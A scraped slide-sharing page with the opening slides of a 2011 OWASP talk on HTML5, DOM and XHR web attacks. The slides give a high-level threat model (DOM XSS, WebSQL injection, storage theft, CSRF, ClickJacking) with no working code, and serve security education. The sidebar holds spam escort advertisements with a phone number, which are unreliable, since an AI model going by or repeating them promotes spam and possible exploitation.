다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
다양한 솔루션으로 만들어가는 AWS 네트워크 보안::이경수::AWS Summit Seoul 2018
 
Network Security and Access Control within AWS
Network Security and Access Control within AWSNetwork Security and Access Control within AWS
Network Security and Access Control within AWS
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
 

Viewers also liked

MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...Valeri Karpov
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developersKai Koenig
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQueryKim Hunmin
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM ManipulationsYnon Perek
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answersAnil Singh
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSSimon Guest
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tipsNir Kaufman
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedFITC
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS ConceptsKyle Hodgson
 

Viewers also liked (12)

Angularjs Basics
Angularjs BasicsAngularjs Basics
Angularjs Basics
 
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
MEAN Stack NYC Meetup 20150717: TDD Your AngularJS + Ionic Directives With jQ...
 
AngularJS for designers and developers
AngularJS for designers and developersAngularJS for designers and developers
AngularJS for designers and developers
 
Dom selecting & jQuery
Dom selecting & jQueryDom selecting & jQuery
Dom selecting & jQuery
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahFind me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahowaspindia
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworksukdpe
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profilemoseskhedi
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profileelenarys
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsJames Pearce
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsJames Pearce
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahFind me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applications
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 

Recently uploaded (20)

08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

  • 1. Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.net OWASP 22nd Sept. 2011 OWASP AppSec USA 2011 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
  • 2. http://shreeraj.blogspot.com shreeraj@blueinfy.com Who Am I? http://www.blueinfy.com Founder & Director Blueinfy Solutions Pvt. Ltd. SecurityExposure.com Past experience Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking OWASP 2
  • 3. Agenda Next Generation Application’s Attack Surface and Threat Model HTML 5 – Tags, Storage & WebSQL DOM – Vulnerabilities & Exploits Abusing Sockets, XHR & CSRF ClickJacking & Exploting Rich HTML Components Reverse Engineering across DOM OWASP 3
  • 5. Real Life Cases Last three years – several application reviewed (Banking, Trading, Portals, Web 2.0 sites etc…) Interesting outcomes and stats Auto scanning is becoming increasingly difficult and impossible in some cases Sites are vulnerable and easily exploitable in many cases OWASP 5
  • 6. Technology Shift & Trend • Android • iPhone/Pad • HTML 5 Other • • Storage • Flash Mobile • AMF • WebSocket • DOM • WebSQL • JS • Storage• Flex • XHR • XAML Server side Components • Silverlight • WCF Presentation Layer • NET Business Layer Client side Data Access Layer Components Authentication (Browser) Communication etc. Runtime, Platform, Operating System Components OWASP 6
  • 7. Browser Model Mobile HTML5 Silverlight Flash Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Storage XHR WebSocket Plug-in Sockets Browser Native Network Services Network & Access Same Origin Policy (SOP) Sandbox Core Policies OWASP 7 7
  • 8. Layers Presentation HTML5 Silverlight Flash/Flex Process & Logic JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc. Network & Access XHR – Level 2 WebSockets Plugin-Sockets Core Policies SOP Sandboxing for iframe Shared Resources OWASP 8
  • 9. Application Architecture Trading Weather Ajax Email RIA (Flash) Banking HTML / JS / DOM End Client Browser Blog Stack Internet Internet Web Services Web Server Data-access Application Server Database Auth. Access Authentication Server OWASP 9
  • 10. Attack Surface Expansion JSON/XML streams POST name HTTP Response and value pairs variables XML/JSON QueryString etc. Ajax RIA (Flash) HTTP variables Cookie etc. DOM calls/events HTML / JS / DOM File attachments uploads etc. API - streams Open APIs and Feeds and other integrated streams party information OWASP 1 10 0
  • 11. AppSec dynamics Source - OWASP OWASP 11 11
  • 12. Integration and Communications DOM glues everything – It integrates Flex, Silverlight and HTML if needed Various ways to communicate – native browser way, using XHR and WebSockets Options for data sharing – JSON, XML, WCF, AMF etc. (many more) Browsers are supporting new set of technologies and exposing the surface OWASP 12
  • 13. Demos App using DOM, AJAX and Web Services HTML 5 components and usage Fingerprinting Application Assets from DOM or JavaScripts Frameworks, Scripts, Structures, and so on – DWR/Struts OWASP 13
  • 14. Threat Model Sandbox attacks 7 1 XSS abuse with 8 Abusing new features and ClickJacking tags and attributes like drag-and-drop Events Tags & Attributes Thick Features Presentation Injecting and Exploiting WebSQL WebSQL DOM Storage 4 3 Stealing from 2 DOM based XSS the storage Parser/Threads Process & Logic and Redirects 5 XHR WebSocket Plug-in Sockets Abusing network Network API and Sockets Browser Native Network Services & Access CSRF 6 Core across streams Same Origin Policy (SOP) Sandbox Policies 9 Threats to widgets Botnet/Spynet using 10 OWASP WebWorkers 14 and mashups
